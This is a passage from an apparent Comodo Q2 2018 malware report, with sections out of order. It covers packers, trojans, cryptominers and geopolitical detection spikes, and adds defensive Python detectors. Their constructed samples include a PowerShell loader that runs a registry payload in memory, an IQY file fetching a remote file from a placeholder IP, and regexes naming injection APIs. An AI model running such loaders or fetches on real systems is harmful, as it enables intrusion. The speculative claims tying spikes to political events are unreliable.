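        "obj_count": len(_OBJ_HEADER.findall(data)),
        "obfuscated_names": len(_HEX_ESCAPE.findall(data)),
        "counts": counts,
        "auto_exec_script": has_script and has_trigger,
    }


# Constructed samples, not real malware: the first auto-runs an obfuscated JavaScript action.
SAMPLE_SUSPICIOUS_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction 3 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
3 0 obj << /S /J#61vaScript /JS (app.alert('constructed sample')) >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""
SAMPLE_BENIGN_PDF = b"""%PDF-1.4
1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj
2 0 obj << /Type /Pages /Kids [] /Count 0 >> endobj
trailer << /Root 1 0 R >>
%%EOF
"""

if __name__ == "__main__":
    for label, sample in (("suspicious", SAMPLE_SUSPICIOUS_PDF), ("benign", SAMPLE_BENIGN_PDF)):
        print(label, scan_pdf(sample))
```

This is string-level triage, not a PDF parser: names inside Flate-compressed streams or object streams (/ObjStm) are invisible until those streams are inflated, so a non-zero /ObjStm count with nothing else flagged is itself a reason to look closer.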
5.3 Medium Threat Malware
In this section we focus on five malware types that are somewhat rarer and more exotic: Email Flooders, Constructors, Jokes, Virtual Tools and Malware Packers.
5.3.1 Constructors
Constructors are applications that can be used to generate malware files automatically.
For Q2, Alamar was the #1 constructor that Comodo detected. Microsoft describes this program as a "Severe" malware threat to PC users.
In Q2, Germany (de) was the top country of detection for Constructors.
The timeline shows that Germany not only had a serious problem with Constructors in Q2 but also that this malware is likely a persistent threat to German networks.
5.3.2 Packers
"Packing" refers to any technique that hides or obfuscates malicious executable code by compressing or encrypting it inside a larger, seemingly innocuous program or data stream; the hostile code can even be a script. The packed data carries its own decompression stub, or is a self-extracting archive, which rebuilds the original code from the compressed form and then executes the malware. Encryption may also be layered on to conceal the malware from security software.
MUPX, a modified "Ultimate Packer for Executables" (UPX), dominated this part of the malware landscape. UPX itself is free, open-source software that supports numerous file formats and operating systems and uses the open-source UCL compression library, whose decompressor is only a few hundred bytes of code. The "modified" part matters to defenders: the changes typically alter headers or section names so that the stock UPX tool cannot unpack the sample and simple name-based signatures miss it.
In Q2 2018 Russia was the #1 home of malware Packers.
The timeline shows that Russia had the most persistent Packer problems, while Iran had the highest periodic spikes.
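An added example, not Comodo's code, showing why a modified UPX is harder to spot than a stock one: the section-table walk below detects stock UPX by the UPX0/UPX1 section names it writes, and falls back to per-section Shannon entropy, which a packer cannot scrub because compressed or encrypted code is high-entropy whatever the header says. The PE images are built by a helper that constructs minimal, non-runnable files for the demonstration; the 7.0 bits-per-byte threshold is an assumption to tune against your own sample set.

```python
"""Spot UPX-style packing in a PE file two ways: by the section names stock
UPX writes (UPX0/UPX1) and by section entropy, which survives the header
edits a modified UPX makes to defeat name-based signatures and the stock unpacker."""
import math
import struct

UPX_SECTION_NAMES = {"UPX0", "UPX1", "UPX2"}
ENTROPY_THRESHOLD = 7.0   # assumption: bits/byte above this means compressed or encrypted data


def shannon_entropy(data: bytes) -> float:
    """Entropy in bits per byte: 0.0 for a constant run, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def parse_sections(pe: bytes) -> list:
    """Walk the PE section table and return [(name, raw_bytes), ...]."""
    if pe[:2] != b"MZ":
        raise ValueError("missing MZ header")
    (e_lfanew,) = struct.unpack_from("<I", pe, 0x3C)
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4                            # COFF file header follows the signature
    (num_sections,) = struct.unpack_from("<H", pe, coff + 2)
    (opt_size,) = struct.unpack_from("<H", pe, coff + 16)
    table = coff + 20 + opt_size                   # section headers follow the optional header
    sections = []
    for i in range(num_sections):
        hdr = table + i * 40                       # each IMAGE_SECTION_HEADER is 40 bytes
        name = pe[hdr:hdr + 8].rstrip(b"\0").decode("latin-1")
        size_raw, ptr_raw = struct.unpack_from("<II", pe, hdr + 16)
        sections.append((name, pe[ptr_raw:ptr_raw + size_raw]))
    return sections


def assess_packing(pe: bytes) -> dict:
    scored = [(name, shannon_entropy(data)) for name, data in parse_sections(pe)]
    by_name = [n for n, _ in scored if n in UPX_SECTION_NAMES]
    hot = [n for n, h in scored if h > ENTROPY_THRESHOLD]
    return {
        "sections": [(n, round(h, 2)) for n, h in scored],
        "upx_section_names": by_name,
        "high_entropy_sections": hot,
        "likely_packed": bool(by_name or hot),
    }


def build_sample_pe(sections: list) -> bytes:
    """Constructed, non-runnable PE image with the given [(name, data)] sections; demo only."""
    e_lfanew = 0x40
    header_end = e_lfanew + 4 + 20 + 40 * len(sections)   # SizeOfOptionalHeader is 0 here
    img = bytearray(b"MZ" + b"\0" * 0x3A) + struct.pack("<I", e_lfanew) + b"PE\0\0"
    img += struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)
    cursor, table, blobs = header_end, b"", b""
    for name, data in sections:
        table += name.encode().ljust(8, b"\0")
        table += struct.pack("<IIII", len(data), 0x1000, len(data), cursor) + b"\0" * 16
        blobs += data
        cursor += len(data)
    return bytes(img + table + blobs)


HIGH_ENTROPY = bytes(range(256)) * 16   # stand-in for compressed code: every byte value equally often
LOW_ENTROPY = b"\x00" * 4096

if __name__ == "__main__":
    stock = build_sample_pe([("UPX0", LOW_ENTROPY), ("UPX1", HIGH_ENTROPY), (".rsrc", b"A" * 64)])
    modified = build_sample_pe([(".text", HIGH_ENTROPY), (".data", b"A" * 64)])   # names scrubbed
    print("stock   ", assess_packing(stock))
    print("modified", assess_packing(modified))
```

The `modified` image has the UPX names scrubbed and still scores as packed on entropy alone. Small sections can fool entropy either way, so in practice weight the score by section size and also check where the entry point lands, since packers place it in the section holding the unpacking stub rather than in the original code.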
5.3.3 Email Flooders
Email Flooders are malware used to overwhelm an email server with messages in order to "kill" it or shut it down, a form of denial-of-service (DoS) attack.
The one Email Flooder that Comodo detected in Q2 2018 was Palevo, which Microsoft describes as able to spread not only via email but also by copying itself to removable drives and network folders.
The primary country where Comodo detected this malicious behavior was Germany.
The timeline shows that while the number of Palevo detections was not high, it was still a persistent threat in Germany.
5.3.4 Virtual Tools
Virtual Tools are programs that modify or alter malicious files to help them avoid detection.
The top Virtual Tools that Comodo detected in Q2 2018 were Patcher, AntiAV and RunFile.
The top two countries for Virtual Tools detections were Germany and the US.
The timeline shows that Germany had one particularly heavy infestation around the beginning of June, while the US had two sharp spikes, one at the start and the other at the end of Q2 2018.
5.3.5 Jokes
"Joke" malware is just what it says: non-malicious applications that claim to take a malicious action when in fact they are only intended as humor, or simply to annoy the user for a brief period of time.
Such malware is typically labeled only a "Medium" threat because the author's intention is not to damage or destroy information but merely to have fun at the victim's expense.
Germany (de) and the US were the top two countries of detection for Joke malware.
The timeline shows that this malware type is not numerous, but still something to be aware of.
5.4 Low Threat Malware: Applications
In this section we cover a range of malicious functionality that Comodo detected within Applications, Unwanted Applications and Unsafe Applications.
5.4.1 Applications
Malicious or merely suspicious applications are dangerous because users often download and use such software on purpose. Comodo nonetheless detects and flags such applications as malicious because they exhibit behavior of which users may be unaware, including extreme efforts to track user behavior and location.
In Q2 2018 the most common such application was Elex. Although Microsoft labels Elex only a "Potentially Unwanted Application" (PUA), this software is nasty: it attempts to install files that run at startup, add drivers, inject into processes, alter browser behavior and modify DNS settings.
The bubble chart above shows that the US and Mexico were the most common countries in which Comodo detected these types of Applications.
Finally, the timeline shows that, far from being a rare occurrence, such software is endemic, especially in North America.
5.4.2 Unwanted Applications
The Unwanted Application category is alarming because users often install these applications inadvertently in the course of ordinary computer and Internet activity. Examples include common adware programs, widely disseminated images and videos, dialers, jokes, gossip and more.
The most common Unwanted Application that Comodo detected this quarter was DealPly, which Microsoft describes as "poor reputation" software that tries to install additional bundled software, modify the user's homepage, modify the search provider and/or perform other actions users might not have intended. Such bundles include free toolbars, adware and "system optimizers".
As the bubble chart shows, the US was far and away the most common country of detection for Unwanted Applications in Q2 2018.
As the timeline shows, this malware type poses not only a large but also a daily challenge to network security in the US.
5.4.3 Unsafe Applications
Unsafe Applications are seemingly legitimate programs that are in fact frequently used by coders and attackers with malicious intent. Often they claim to help users with administrative or security functionality but do the opposite; examples include fake anti-virus products and free Internet Relay Chat (IRC) clients.
The most common Unsafe Application that Comodo detected in Q2 2018 was AutoKMS, software used to "crack" or patch unregistered copies of Microsoft software. Such programs are referred to as "hacktools" and may be distributed alongside additional malware that users install inadvertently.
This malware type is a bit different in that, while the US is currently the most common country of detection, Ukraine (ua) and Russia (ru) rank #2 and #3 respectively.
The timeline shows that the US, and to a lesser extent Ukraine, have a steady problem with Unsafe Applications, while Russia experienced one major spike in Q2 2018.
6 Vertical Analysis
In this section we examine the unique malware profiles that Comodo identified within specific "verticals", or economic sectors. The infographic details unique malware distributions for twenty-two vertical markets or industries, from automotive to travel, covering four dangerous malware types: Backdoors, Trojans, Viruses and Worms. The diagram also lists the #1 malware family for each vertical's top malware type.
Let's take a closer look at two trojans, Kryptik and Zbot, that were the top detection not in just one but in multiple verticals, which clearly makes them a current strategic threat across the world.
First, Kryptik. The New Jersey Cybersecurity & Communications Integration Cell reported that Kryptik was first created to obtain information about an infected host's FTP servers but now has the ability to target email clients, file browsers and file managers. CNET Magazine wrote that Kryptik has been used as a trojan "clicker" to boost the hit count of websites and has spread through downloads of Microsoft Silverlight and Adobe Flash. Fortinet noted that in December 2015 Kryptik was found on the networks of Ukrainian power companies during a major cyberattack on that country. Comodo discovered a large outbreak of Kryptik in the US state of Virginia just prior to its gubernatorial election in 2017.
Second, let's examine "Zbot", another name for the "Zeus" Trojan, which has been undermining Microsoft Windows security since 2007. One of its first uses was to target the United States Department of Transportation, and over a decade later Zbot is still the top Trojan in the government and transportation verticals. Today the Zeus botnet may be the largest on the Internet, with millions of compromised machines around the world.
Zeus has often been used to steal financial information such as account numbers and passwords via keystroke logging and online form grabbing. It has also been used to install ransomware, including CryptoLocker. Zbot is often spread through drive-by downloads and email phishing attacks, sometimes supported by a social-engineering scheme that falsely claims the target's computer already has a virus and needs to be cleaned.
In conclusion, trojans are dangerous malware that can be found within every vertical and can be used for a wide variety of cyberattacks. Moreover, strategic analysis like this can be used to create a unique malware profile for each vertical, providing valuable cyber intelligence that clarifies the primary malware threats and better focuses limited time and resources against them.
7 Geopolitical Intelligence
7.1 USA
This timeline displays a range of the most dangerous malware types detected within the United States in spring 2018. Clearly the major spike on March 13 stands out. What happened on that day in the US, and what might explain the surge in malware activity? On that day US President Donald Trump announced the names of his new Secretary of State, Mike Pompeo, and new CIA Director, Gina Haspel. In that light, one likely reason for the dramatic rise in malware detections is that intelligence agencies around the world suddenly received a raft of new collection requirements, comprising many requests for information related to upcoming changes in US political, military and intelligence activities, and immediately began to fulfill them via computer hacking, commonly called cyber espionage, which today takes place on a far greater scale than the public realizes.
7.2 China
This chart illustrates Comodo's aggregated malware detections in China for Q2 2018. June 4 clearly stands out as the single most prominent day. The reason for this massive spike is likely that many intelligence services, both foreign and domestic, were busy trying to protect and/or collect sensitive information relating to current events within China. Why June 4? That is the anniversary of the 1989 Tiananmen Square protests.
7.3 South Korea
National security events always attract the attention of professional hackers, who seek to collect information as the basis for intelligence reporting. This graph shows Comodo's trojan horse malware detections in South Korea during Q2 2018. The highest single spikes coincided with the annual joint US-South Korean military exercises. This should come as little surprise in the Internet age, when everyone from students to soldiers, spies and statesmen does most of their work online: students collect data for academic papers, spies collect data for intelligence reports.
7.4 North Korea
The chart above shows Comodo's malware detections in North Korea during Q2 2018. At the beginning of May Comodo saw a spike of well over ten times the usual number of detections. One plausible explanation is that someone or some institution was either briefly more connected to the Internet than usual or was trying to take advantage of a short period of political openness to better connect with the outside world. Comodo did further research on the detected malware and identified it as Windows activation or "cracking" software and Chinese-made anti-censorship programs.
7.5 Armenia
All major geopolitical events today are bathed in malware. The reason is that all activities, from social life to business, politics and national security affairs, are mostly conducted online. This is especially true during times of national crisis, when both government and citizens are in overdrive trying to gather new information, or trying to prevent others from doing the same. Ample evidence is provided by this timeline, which shows that Armenia's 2018 political revolution coincided with Comodo's largest detection of malware within that country during Q2 2018.
7.6 Belarus
A common hacker refrain is that "information wants to be free". Evidence for this is provided by this timeline, which shows Comodo's Virus and Trojan detections in Belarus in Q2 2018. On June 14, as the government in Minsk passed new legislation aimed at controlling the spread of "fake news", Comodo detected a massive spike in both viruses and trojans. It is possible that the virus outbreak was used specifically to disseminate trojan horses, which were then used for some real-world purpose: to gather, deny or manipulate sensitive information related to the new legislation and its impact on Belarusian society.
7.7 Iraq
Today there is possibly no hotter topic in information security than election hacking. In this chart of Comodo's malware detections in Iraq in Q2 2018, two clear spikes stand out, and both may be associated with recent electoral events. In mid-April Iraq was preparing for a national election, which included the conundrum of how best to secure its electronic dimension. And at the beginning of July Iraq was preparing for a vote recount following accusations of impropriety at the polls.
7.8 Ukraine
Sometimes it is hard to know the reason for a specific spike in malware detections, and sometimes there may be multiple reasons. In this timeline of Comodo's malware detections in Ukraine in Q2 2018, there may have been several reasons for the highest spike, on May 24. Both of the cited news stories are from May 23: the first discusses Ukraine's Independence Day and Ukraine's testing of new military weapons provided by the US government; the second describes a cyberattack that Ukraine feared would target a major sporting event, the Champions League final in the capital, Kyiv, on May 26.
7.9 Croatia
Since the cyberattack that targeted Estonia in 2007, it has been clear that cyberattacks can be used to punish not only individuals and enterprises but entire nations. In that context, the massive spike in malware detections in Croatia on March 28 is interesting: it came a mere day after the Russian government called a Croatian decision to expel a Russian diplomat (in solidarity with London over the alleged poisoning of a former Russian spy in England) an "act of hostility".
7.10 Finland, Russia, USA
Finally, let's look at Comodo's virus detections in Finland during Q2 2018. The largest single spike, by far, occurred on the day the press began to report that Donald Trump and Vladimir Putin would hold a summit in the Finnish capital, Helsinki. Geolocation of this virus activity in Finland showed that it took place almost exclusively in Helsinki's suburb of Vantaa, precisely where the summit was scheduled to take place.
8 Conclusions
In Q2 Comodo Cybersecurity observed several significant new trends likely to strongly influence the cybersecurity marketplace and IT end users. These trends not only demonstrate an upswing in malware across the world but presage possible future cybersecurity scenarios.
The rise in trojan malware in the last quarter suggests that the spread of malware in general will soon be amplified. Trojans are a covert weapon, and the cybersecurity industry should assume that many trojan-based attacks that occurred in Q2 remain undetected, with their real impact being revealed in quarters to come. Another meaningful fact is that trojans serve as a delivery vector for other types of malware. Combined, these facts point to a large surge in infections of hosts worldwide with a diversity of malware samples.
Our findings show that malware is becoming more cunning in its delivery methods, more sophisticated in persistence and much harder for antivirus software to detect. The propagation of fileless malware, the evolution of cryptominers and the use of legitimate tools like PowerShell in attacks are clear evidence of this uptick in sophistication.
Mobile devices are becoming more attractive targets for cybercriminals because handsets and tablets contain a variety of valuable information yet lack protection comparable to that on desktop systems, which presages new attacks and new mobile malware development. As more people use their mobile devices for financial transactions (via banking and e-payment apps) and to store confidential information (such as messenger correspondence and private pictures), cybercriminals can anticipate rich pickings from exploiting those devices. After a successful penetration, perpetrators profit by stealing money, selling confidential information or blackmailing victims.
Moreover, given that the majority of trojans detected in Q2 were information stealers, we can see another dangerous tendency: cybercriminals' accelerating bias toward hunting for confidential data.
Combined, these trends promise a heavy impact on the cybersecurity marketplace and on IT end users in the future, changing the cybersecurity landscape and forcing IT security departments to update their security measures and probably revamp their security strategies, policies and postures.
About Comodo Cybersecurity
Comodo Threat Research Labs monitors, filters and analyzes malware, ransomware, viruses and other "unknown" potentially dangerous files 24/7/365 in over 190 countries around the world. With 5 offices spread across the Americas, Asia and Europe (and staff covering over 190 countries), the Lab is made up of more than 220 IT security professionals, ethical hackers, computer scientists and engineers (all full-time Comodo Cybersecurity Lab employees) analyzing millions of potential pieces of malware, phishing, spam or other malicious/unwanted files and emails every day.
The Lab also works with trusted partners in academia, government and industry to gain additional insights into known and potential threats. CTRL's mission is to use the best combination of cybersecurity technology and innovations, machine learning-powered analytics, artificial intelligence and human experts and insights to secure and protect Comodo Cybersecurity customers, business and public-sector partners and the public community.
Comodo Cybersecurity is a global innovator of cybersecurity solutions protecting critical information across the digital landscape. Building on its unique position as the world's largest certificate authority, Comodo Cybersecurity authenticates, validates and secures networks and infrastructures, from individuals to mid-sized companies to the world's largest enterprises. Comodo Cybersecurity provides complete end-to-end security solutions across the boundary, internal network and endpoint, with innovative technologies solving the most advanced malware threats, both known and unknown. With global headquarters in Clifton, New Jersey, and branch offices in Silicon Valley, Comodo Cybersecurity has international offices in China, India, the Philippines, Romania, Turkey, Ukraine and the United Kingdom. For more information visit comodo.com. Comodo Cybersecurity and the Comodo Cybersecurity brand are trademarks of the Comodo Cybersecurity Group Inc. or its affiliates in the US and other countries. Other names may be trademarks of their respective owners. The current list of Comodo Cybersecurity trademarks and patents is available at comodo.com/repository.
Flawed Ammyy is delivered to victims through phishing emails with an IQY file attachment, as in the following screenshot.
[Screenshot: the phishing email]
IQY files are meant for making an Internet query from MS Excel: an IQY contains a URL and related parameters, and Excel downloads the content at that URL and loads it straight into the worksheet.
The malicious IQY contained an attacker-controlled URL, and the content fetched from it started a chain of malicious files that ended with Flawed Ammyy being downloaded and run via Windows PowerShell.
[Screenshot: the malware runs PowerShell]
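An added example of the IQY handling described above, not Comodo's code: it parses the three-line WEB/version/URL header and the key=value parameters that follow, then applies a default-deny policy to the URL Excel would fetch. The allow-list, the policy rules and both sample files are constructed for the demonstration; the 203.0.113.0/24 address is a documentation range, not an indicator from the campaign.

```python
"""Parse an Excel Internet Query (.iqy) attachment and decide whether the URL
it would make Excel fetch should be allowed. Format: line 1 is the literal
WEB, line 2 the version, line 3 the URL, then optional key=value parameters."""
import ipaddress
from urllib.parse import urlparse

# Assumed policy: HTTPS only, to an allow-listed host, no raw IPs, no paths that look like code.
CODE_EXTENSIONS = (".exe", ".dll", ".scr", ".ps1", ".hta", ".vbs", ".js", ".bat", ".cmd")


def parse_iqy(text: str) -> dict:
    """Split an IQY into its version, URL and parameter dictionary; reject anything that is not a WEB query."""
    lines = [ln.strip() for ln in text.splitlines() if ln.strip()]
    if len(lines) < 3 or lines[0].upper() != "WEB":
        raise ValueError("not an Excel WEB query file")
    params = {}
    for ln in lines[3:]:
        key, _, value = ln.partition("=")
        params[key.strip()] = value.strip()
    return {"version": lines[1], "url": lines[2], "params": params}


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def assess_iqy(text: str, allowed_hosts=()) -> dict:
    """Default deny: the query is allowed only if every policy check passes."""
    query = parse_iqy(text)
    url = urlparse(query["url"])
    host = (url.hostname or "").lower()
    reasons = []
    if url.scheme.lower() != "https":
        reasons.append("scheme is not https")
    if is_ip_literal(host):
        reasons.append("host is a raw IP address")
    if host not in {h.lower() for h in allowed_hosts}:
        reasons.append("host is not allow-listed")
    if url.path.lower().endswith(CODE_EXTENSIONS):
        reasons.append("path names an executable or script")
    return {"url": query["url"], "host": host, "params": query["params"],
            "verdict": "block" if reasons else "allow", "reasons": reasons}


# Constructed samples. 203.0.113.0/24 is a documentation range, not a real attacker host.
SAMPLE_MALICIOUS_IQY = """WEB
1
http://203.0.113.10/1.dat
Selection=AllTables
Formatting=None
"""
SAMPLE_BENIGN_IQY = """WEB
1
https://reports.example.com/q2/sales.csv
Selection=AllTables
"""
ALLOWED = ("reports.example.com",)   # assumed corporate allow-list

if __name__ == "__main__":
    for sample in (SAMPLE_MALICIOUS_IQY, SAMPLE_BENIGN_IQY):
        result = assess_iqy(sample, ALLOWED)
        print(result["verdict"], result["url"], "; ".join(result["reasons"]))
```

Note what the file does not contain: the payload. The IQY holds only the URL, and the content that started the chain came back in the HTTP response, so a scanner that looks for shellcode or macros inside the .iqy itself finds nothing. That is why the verdict keys on where the query goes, and why blocking or allow-listing .iqy attachments at the mail gateway is the simpler control.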
Thus, in this case, machines face extremely dangerous and potent malware created and delivered via legitimate software, which makes it much harder for antivirus software to detect the attack.
2.4 The growth of Flawed Ammyy attacks for Q2
2.5 Ammyy Admin dissemination around the world for Q2
As illustrated, trojans became the 800-pound gorilla of the malware market in Q2. This trend will inevitably entail a shift of attack vectors toward covert theft and the manipulation of users, a real gift for cybercriminals and a nightmare for users.
Trojans let attackers gain time. Because the malware acts covertly, the cybercriminals have more than enough time to use stolen data to their advantage; in many cases attacks are discovered only when it is too late, after money has been withdrawn from a bank account or confidential data has been published. The combination of trojans as payloads and phishing emails as the means of delivery observed during Q2 will result in a large surge in such attacks and victims, and the use of legitimate tools like PowerShell to run malware will amplify the number of victims even more, because such attacks are much harder for antivirus software to detect.
To fight these attacks, cybersecurity departments need to rearrange their approach to security measures in line with the trends above. Combining the best malware detection tools with data-protection methods built on defense-in-depth principles provides the most promising solution.
[Chart: Flawed Ammyy detections by month in Q2 2018: Apr 43188, May 46382, Jun 48881]
3 Cryptominer Evolution
Going Fileless, Killing Competitors, Crashing Systems
Cryptominers do not lead the Q2 malware pack, but that does not mean their impact has greatly diminished. On the contrary, current cryptominer behavior recalls that of an army preparing for battle: training and reprovisioning to fight more efficiently. Cryptominers are quickly developing and gaining new, dangerous abilities.
Earlier cryptomining examples were only able to use the infected machine's resources to mine cryptocurrency on behalf of the attackers. For that reason, many users did not regard them as particularly dangerous: at least cryptominers would not steal information or destroy data like other malware, merely sucking up CPU resources. Moreover, they typically did not employ strong obfuscation and could be easily discovered and deleted.
But Q2 events clearly showed that the situation has radically changed.
New samples of cryptominers detected by Comodo malware analysts exhibit far more harmful abilities than those required for merely mining cryptocurrency. These samples clearly show that cryptominers are transforming into a sophisticated and multifunctional weapon for cybercriminals. They are learning to hide and to fight against anti-malware tools. They can camouflage themselves, kill competing cryptominers, and even crash user systems if met with an attempt to delete the malware.
3.1 BadShell attacks enterprises
Fileless malware is next-generation malware, especially compared with traditional infection via exe files. File-based malware resides on the hard drive, making it easier to detect. But fileless malware is different. As its name suggests, this type of malware consists of malicious code injected into legitimate OS processes. It need not be installed on the victim machine but functions only in memory, making it much harder for antivirus software to detect.
Usually such malware is spread via malicious ad banners. Clicking on a banner redirects the user to an infected website, where the malware covertly installs itself on the victim's computer. As many antivirus tools cannot detect it, users remain unaware of being infected. Not surprisingly, its use by cybercriminals is on the increase.
Last quarter, Comodo Threat Research Labs analysts faced just such an attack. A company with several thousand endpoints was compromised by fileless malware. When their legacy security software failed to protect them, the company looked to Comodo Threat Research Labs for assistance.
Comodo analysts revealed that the malware was a cryptominer that utilized legitimate Windows processes: PowerShell to execute commands, Task Scheduler to ensure persistence, and the Registry to hold the malicious binary code. In the screenshots below you can see exactly how the malware, dubbed BadShell, works.
If we decode the PowerShell arguments, we see the malicious code in the registry. The code is injected into an existing running process by the PowerShell script.
BadShell at work
The malicious code in the registry
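As an added example (not the report's or BadShell's code), a Python triage routine that decodes PowerShell -EncodedCommand arguments found in process command lines and flags the traits described above: a payload read from the registry, decoded and run in memory, and a hidden window. The sample command lines, the registry path and the loader text are constructed placeholders.

```python
"""Triage PowerShell process command lines for the BadShell pattern described above.
Added example, not the report's or the malware's code; samples are constructed."""
import base64
import re
from typing import Dict, List

# -e, -ec, -enc, -encodedcommand ... followed by the Base64 blob PowerShell decodes as UTF-16LE.
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})")

INDICATORS = {
    "registry_payload": re.compile(r"(?i)Get-ItemProperty(?:Value)?\b.*\bHK(?:CU|LM|EY_)"),
    "base64_decode": re.compile(r"(?i)FromBase64String"),
    "in_memory_exec": re.compile(r"(?i)\b(?:iex|Invoke-Expression)\b|\[Reflection\.Assembly\]::Load"),
    "injection_api": re.compile(r"(?i)VirtualAlloc|WriteProcessMemory|CreateRemoteThread"),
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
}


def decode_encoded_command(cmdline: str) -> str:
    """Return the decoded -EncodedCommand script, or '' if there is none or it is malformed."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def analyze_command_line(cmdline: str) -> Dict[str, object]:
    """Match indicators against the visible arguments plus the decoded script."""
    decoded = decode_encoded_command(cmdline)
    text = cmdline + "\n" + decoded
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # BadShell's defining trait: the binary lives in the registry and is run from memory.
    verdict = "suspicious" if {"registry_payload", "in_memory_exec"} <= set(hits) else "benign"
    return {"decoded": decoded, "indicators": hits, "verdict": verdict}


def triage(command_lines: List[str]) -> List[Dict[str, object]]:
    return [dict(cmdline=c, **analyze_command_line(c)) for c in command_lines]


def encode_powershell(script: str) -> str:
    """Encode a script the way -EncodedCommand expects (used here only to build samples)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples modelled on the description above; the registry path and value
# name are placeholders, not BadShell's real ones.
REGISTRY_LOADER = encode_powershell(
    "$blob = (Get-ItemProperty 'HKCU:\\Software\\PlaceholderVendor\\Cache').Payload; "
    "$bytes = [Convert]::FromBase64String($blob); "
    "IEX ([Text.Encoding]::Unicode.GetString($bytes))"
)
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoProfile -Command Get-Date",
    "powershell.exe -w hidden -enc " + encode_powershell("Get-Date"),
    "powershell.exe -NoP -W Hidden -EncodedCommand " + REGISTRY_LOADER,
]

if __name__ == "__main__":
    for r in triage(SAMPLE_COMMAND_LINES):
        print(r["verdict"], r["indicators"])
```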
This emergency clearly demonstrates how dangerous cryptominer activity can be. Just imagine it: the entire compute capacity of the enterprise's computers was engaged in mining cryptocurrency, depriving employees of the ability to perform their jobs. Comodo analysts took over the situation and cleaned the infection from all involved computers, but of course the company's financial losses were irreversible.
Invulnerability to antivirus and persistence in the system are the most important attributes for a cryptominer, because the longer it runs within the infected system, the more it profits the attackers. That is why cybercriminals give special attention to a cryptominer's ability to elude antivirus software.
Below is another cunning technique that turns an infected machine into a slave of the attacker.
3.2 WinstarNssmMiner, a system killer
Like other cryptominers, WinstarNssmMiner is purposed to steal computer resources to mine cryptocurrency coins for cybercriminals. But it has a special feature: it can root itself into a system so deeply that it becomes unremovable. Attempting to kill it will kill the target system entirely.
The secret of WinstarNssmMiner's persistence lies in its method of infecting a victim's computer. It consists of two processes injected into two system svchost.exe processes. The first performs the main task: mining cryptocurrency. The other runs in the background, looking for antivirus products and disabling them.
The malicious code disguised as svchost.exe
Especially impressive is that both infected svchost.exe processes possess the system attribute "CriticalProcess", meaning that terminating either of them will crash the system, leaving the user with a blue screen.
WinstarNssmMiner spreading around the world
Cryptominers can kill not only victims' systems but also their cryptomining competitors.
3.3 CoinMiner kills rivals
CoinMiner stands out against other cryptominers with a kill-list feature that checks the infected machine for the presence of other cryptomalware. If an "alien" cryptominer is detected, the feature terminates its processes.
CoinMiner kills its rivals as follows:
The code below downloads CoinMiner for the Windows architecture (x86 or x64) and then checks if a miner is already running by testing for the presence of an "AMDDriver64" process.
The code downloads CoinMiner and checks if a miner is already running
The malware maintains two lists, named $malwares and $malwares2, with the names of the processes that it is instructed to kill. The lists include other types of cryptominers.
In this way, CoinMiner undividedly occupies the victim's computer to use its resources for mining cryptocurrency.
Some cryptominers earned the spotlight of the mass media and cybersecurity researchers, easing their detection by users. In Q2 these cryptominers learned to hide; CoinHive is the brightest example of them.
3.4 CoinHive changes its skin
CoinHive is a popular JavaScript cryptominer. If you put its string of code into your website page, every visitor to the site will mine coins for you.
As you can see, the CoinHive script is easily detected.
The CoinHive script
After many publications on this subject in the mass media and cybersecurity reports, users have started checking website code for cryptominers. But in the second quarter, perpetrators found a way to overcome this obstacle. Now they use a sneaky trick to camouflage the CoinHive presence with URL shorteners.
As a result, the malicious code on a webpage looks like this:
The obfuscated malicious code on a webpage
If we decode the string, we encounter an iframe.
The iframe loads the URL shortener
Notice that the width and height of the iframe are set to 1 to make the iframe as invisible as possible.
Now let's look at the URL https://cnhv.co
And there we find the familiar link to CoinHive.
The link to CoinHive
What is the impact of this trick? In a simple scenario, a user visits a CoinHive-infected website. Noticing that her computer's CPU is overloaded, she decides to check the webpage code but doesn't find any signs of a cryptominer. So she concludes that something went wrong with her PC, while CoinHive co-opts her computer to mine cryptocoins.
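As an added example (not code from the report), a Python scanner that undoes the unescape()/atob() wrapping inside document.write() calls and reports iframes that are 1x1 or point at the cnhv.co and coinhive.com hosts named above. The page fragments are constructed, and the shortlink path EXAMPLE is a placeholder rather than a real link.

```python
"""Find iframes hidden behind obfuscated document.write() calls in page HTML.
Added example, not the report's code; the HTML fragments are constructed."""
import base64
import re
from typing import Dict, List
from urllib.parse import quote, unquote, urlsplit

# Hosts the report walks through: the cnhv.co shortlink service and coinhive.com itself.
MINER_HOSTS = {"cnhv.co", "coinhive.com"}

UNESCAPE = re.compile(r"unescape\(\s*(['\"])(.*?)\1\s*\)", re.S)
ATOB = re.compile(r"atob\(\s*(['\"])(.*?)\1\s*\)", re.S)
IFRAME = re.compile(r"<iframe\b([^>]*)>", re.I)
ATTR = re.compile(r"(\w+)\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))")


def _b64(text: str) -> str:
    try:
        return base64.b64decode(text, validate=True).decode("utf-8", "replace")
    except ValueError:
        return text          # not base64 after all: leave it in place


def deobfuscate(html: str, max_rounds: int = 5) -> str:
    """Replace unescape('%3C...') and atob('PGlm...') calls with their decoded text,
    repeating so that nested layers are peeled as well."""
    for _ in range(max_rounds):
        step = UNESCAPE.sub(lambda m: unquote(m.group(2)), html)
        step = ATOB.sub(lambda m: _b64(m.group(2)), step)
        if step == html:
            break
        html = step
    return html


def _attrs(raw: str) -> Dict[str, str]:
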